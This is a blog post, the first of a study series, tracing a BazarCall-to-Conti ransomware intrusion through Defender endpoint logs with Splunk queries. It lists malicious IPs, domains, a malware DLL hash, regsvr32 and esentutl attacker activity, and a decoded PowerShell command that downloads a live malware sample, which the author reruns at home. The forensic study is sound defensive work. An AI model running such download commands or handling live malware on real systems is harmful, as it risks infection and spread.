Open in app

Sign in

Write

Sign in

Studying “BazarCall to Conti Ransomware via Trickbot and Cobalt Strike”: Part 1

Salim Salimov
9 min readMar 17, 2024

--

Digging into Microsoft Defender Endpoint log files with Splunk.

Hello Medium users, hope you all doing well .

Today, I am starting a mini-series of study blogs about a ransomware attack that occurred in 2021 , that i have got information about from TheDFIRreport website , where you can check it out as well.

I have also been provided with a good collection of post incident data for analysing : MDE log files , Vhdx disk image files taken with Kape , volatile memory dump files and a bunch of pcap files. All this data has been collected from 4 machines in the compromised company network.

MDE logs are in csv format

1. Preparing Data in Splunk:

I have uploaded all available 4 csv log files together to splunk under same index created specially for them.

This way instead of source= “<example>” my search queries can start with index= “csv_files” to be able to search for events in all 4 logs together. For more detailed guide how to upload log files to Splunk ,please check out one of my previous blogs here .

2. Before i start searching for any malicious activities I would like to know few things about the local network of the company network.

To list all computers on the local network i have simply Searched for index=”csv_files” that loads all the events from the loaded log files.

Then in Splunk’s fields panel I have looked in computer name field : found the names of 4 computers.

  • To find the list of all IPs in this local network I just scrolled bit more down and checked the Local Ip field.

Next i could start to search for malicious activities.

3. Analyzing Login Attempts:

  • tried to find failed logon attempts.
index="csv_files" "Action Type"=LogonFail

or 

index="csv_files" "Action Type"=LogonFailed

These query didn’t get me any results also I couldn’t see anything related in the interesting fields.

  • Next i have tried to look for successful logon attempts from suspicious sources, remote login attempts, for example usage of Remote Desktop Protocol (RDP).

(As not very familiar with MDE logs yet , I use a Splunk cheatsheet for Sysmon EVTX logs then trying to find alternative queries to adapt for MDE logs.)

index="csv_files" "Action Type"=LogonSuccess "Logon Type"=RemoteInteractive

This query returned single result which helped me to find a compromised account name and some more information that i can refer back to later on during my investigation.

  • Next i have searched for other suspicious events with this account name.
index="csv_files" | search "Account Name"="a**********" "Action Type"=InteractiveRemoteComponentInvocation

Not much I could spot apart from Splunk suggesting these events could be representing T1078 (mitre)/T1021.001 (mitre) tactics which is use of “Valid Accounts or Remote Services: Remote Desktop Protocol” and “RDP connections” as described in MitreAtt@ck framework website.

  • Then i have carried on with the following search query:
index="csv_files" "Action Type"=ConnectionFailed
First Malicious IP

As seen on the screenshot in top 10 remote ip activities there is only one IP that looks like external public IP. The rest in the list seems belong to another subnet in company’s priviate network.A quick check on Virustotal shows that 10 vendors flagged this IP located in Bulgaria as malicious. I have then decided to trace back as much as possible the related activities as if there is any successful connection to this IP and when it is been connected successfully for first time with following query :

index="csv_files" "Remote IP"="88.80.147.101" "Action Type"=ConnectionSuccess 
| reverse

The reverse here is used to put the events in chronological order so i can see the earliest event on top of the results. And On the first/top result we can see the process “tdrE934.exe” initiated a connection to the remote IP address 88.80.147.101 on port 80 from the local IP address 10.100.100.22. The connection was established successfully. Account name used is “h**********” , aditional details about the initiating process, such as its creation time, file name, and folder path.

With some extra search about the this ip Also I have found that it’s associated with this domain “gmbfrom.com” , another suspicious files with similar name “tdr615.exe”, “tdr2269.exe” , “tdr5BDD.exe” in addition to that some suspicious activities of legitimate taskhostw.exe and explorer.exe that possibly been modified/abused. Needs some more investigations.

4. Accounts:

Based on finding from searches above it seems like “a**********” and “h**********” are the two main accounts attackers been using for their malicious activities in the the company network.

5. Unusual Activity:

  • I wanted to see which of the above mentioned accounts activities are the most suspicious . Started with checking for any other suspicious remote IPs:
index="csv_files" a********** OR h********** "Remote IP"="*"

In the query i have used above i have given the two account names and remote IP set to be anything . The symbol “*” for the Remote IP value represents anything in regex which is supported in the Splunk’s query language.

Second Malicious IP

Spotted second Malicious IP and according to Virustotal it is detected as malicious also it is related to Cobalt_strike.exe.

  • A note has been taken, and I’m moving on to the next query:
index="csv_files"   149.248.52.187 OR 88.80.147.101

Using this query I found another remote url related to them “onlineworkercz.com” along with some other useful information for new processes and files that are also involved. All saved into my notes.

  • Continuing to search for the initial time and how attackers put their foot inside the organization I have tried few queries similar to the one below:
index="csv_files" a*********** OR h*********** | search "Action Type"=ImageLoaded "Initiating Process Command Line"="*\temp*"
| reverse

Attackers normally downloading/dropping/executing their malware from unusual or hidden and temporary locations in the system . My aim with this query was to check if such a tactic has been used in this case too.

As results I have found three image loaded events exsecuted from /tmp folder of “win81.lakestatebank.local” machine with account name “h**********”

a) First event indicates that the user “h**********” executed the “regsvr32.exe” process, which loaded the DLL file “87402c2ee3595cd862dbb82648aa9ebf17d41ceb05f912e50493d9ba96acb9a4.dll” located in the temporary directory “C:\Users\H**********\AppData\Local\Temp” into memory, with the parent process being “cmd.exe”.

b) The Second event indicates that the user “h**********” executed the “regsvr32.exe” process, which loaded the DLL file “87402c2ee3595cd862dbb82648aa9ebf17d41ceb05f912e50493d9ba96acb9a4.dll” located in the temporary directory “C:\Users\H**********\AppData\Local\Temp” into memory. The parent process of “regsvr32.exe” was another instance of “regsvr32.exe”.

c) The “esentutl.exe” process was created with the command line argument to perform a specific operation (“/p /o C:\Users\H***********\AppData\Local\Temp\grabber_temp.edb”). The parent process of “esentutl.exe” was “svchost.exe”.

6. Outbound Connections:

  • To investigate outbound connections to external IP addresses i have used the query below:
index="csv_files"   | search "Action Type"=OutboundConnectionToWebProtocol| top limit=20 "Remote IP"

With this query I have looked at statistics tab and as you can see 19 outbound remote IP addresses most of them appear to be malicious according to Virus total.

In this table I have color coded malicious and clean IP addresses respectfully with red and green.

7. A Brief Threat Hunting:

At this point I wanted to go back to dig a bit deeper for the newly found DLL file .

  • Search query with the filename:
index="csv_files"  87402c2ee3595cd862dbb82648aa9ebf17d41ceb05f912e50493d9ba96acb9a4.dll | reverse

Seems like there are no information about how it has been created but I have the hash of it which is strangely same as the filename.Checking in Virustotal confirms that is flagged malicious by huge number of vendors.

In one of my previous articles here I wrote about that attackers often can use Powershell commands to download and execute malware apps using base64 in powershell command. This might be the reason why I cannot find where this file coming from. To check my hypothesis I am going to include in a new search query some information from the event above without the file name.

index="csv_files" "Action Type"=FileCreated AND
 "Computer Name"="win81.lakestatebank.local" AND "powershell.exe" AND "EncodedCommand"
| reverse

Here I was looking for file created in this computer with powershell.exe runing a command that includes EncodedCommand. As a result Splunk returned three events with a base 64 in a powershell command line:

what I have done next is decoded this base64 code using CyberChef:

  • So I have a human readable command line that has been executed with powershell:
Invoke-WebRequest -Uri https://mb-api.abuse.ch/api/v1/ -Method POST -Body "query=get_file&sha256_hash=87402c2ee3595cd862dbb82648aa9ebf17d41ceb05f912e50493d9ba96acb9a4" -outfile C:\users\1.zip

To my understanding this command line makes a Post request to the given url to download a file by it’s hash (not by the file name , which explains why the file I found earlier has it’s hash as a filename) then saves it wrapped in a zip file to C:\users\1.zip

  • To have this confirmed I just copied this powershell command line and edited/changed the download path to a folder in my desktop created specially for it and run this command on my machine.
A password protected file 1.zip has been downloaded to the pointed location.

With quick research on internet I have found that the url malicious file has been downloaded from is a legitimate website that provides malware samples and the samples come in compressed zip files with a Password: “infected” . Now I can use this password to extract the file and investigate further using other tools if needed. I can also check what the website provides as info about it too:

tags Bazaarcall , Trickbot
  • After has been downloaded the file seems has been unzipped,moved, renamed and executed by other processes.

But the question how this file came to this computer ? — still remains. What initiated powershell to download this file?

  • I went back to the latest log to see what was the parent process?

As we can see its file name is Velociraptor.exe and process id is 1732. I am a step closer but yet I don’t know how attacker made its way into the company.

  • Seems I have run out of ideas how to reach to the initial access file using only MDE logs , might be another powershell command line from a powershell script (.ps1) I have seen many of them in the logs but not sure which one to dig into.

8. Document Findings

  • I put all finding in notes and created a table that i can use with another tools to investigate further.

Thanks to Everyone for stopping by and reading my article, hope you have enjoyed it. See you soon again in the Part 2 of this mini series.

Tools and resources used in this blog:

Linux Mint — my running OS

Splunk-with Free License

Proxmox Home Lab , Windows11 Vm

Cheatsheet and Artifacts provided from my mentors at Maltrak.com

Story preview image from: https://freerangestock.com/

--

--

Salim Salimov

Written by Salim Salimov

36 Followers

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams